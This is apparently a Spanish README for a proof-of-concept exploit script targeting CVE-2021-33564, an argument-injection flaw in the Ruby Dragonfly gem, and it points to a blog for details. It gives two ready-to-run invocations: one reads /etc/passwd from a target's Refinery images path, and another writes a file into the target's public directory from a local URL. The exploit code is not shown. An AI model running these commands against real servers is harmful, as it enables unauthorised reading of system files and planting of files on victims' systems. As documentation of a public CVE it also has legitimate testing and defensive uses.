
Inyección de Argumentos en el exploit de la gema Ruby Dragonfly (copia de seguridad)
Script de explotación para CVE-2021-33564 (Inyección de argumentos en la gema Ruby Dragonfly).
python3 poc.py -u https://<target_url>/system/refinery/images -r /etc/passwd
python3 poc.py -u https://<target_url>/system/refinery/images -w public/test.txt -c test.txt -lu http://<local_url>
Para más información, visita el blog.